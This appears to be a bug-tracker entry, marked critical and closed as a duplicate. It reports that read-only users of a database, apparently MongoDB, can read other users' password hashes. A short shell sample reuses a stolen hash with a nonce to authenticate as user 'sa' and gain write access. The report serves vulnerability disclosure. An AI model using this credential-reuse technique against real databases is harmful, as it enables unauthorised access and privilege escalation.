-
Type: Bug
-
Resolution: Duplicate
-
Priority: Critical - P2
-
None
-
Affects Version/s: None
-
Component/s: Security
-
None
-
Environment:all
-
ALL
read only user can get write priority by access other users's pwd hash
sample:
> db.system.users.find()
> db.$cmd.findOne(
{getnonce:1})
{ "nonce" : "9892be9572e9851e", "ok" : 1 }> db.runCommand(
{ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
{ "ok" : 1 }- is related to
-
SERVER-4692 Read-only users should be denied access to system.users collection
- Closed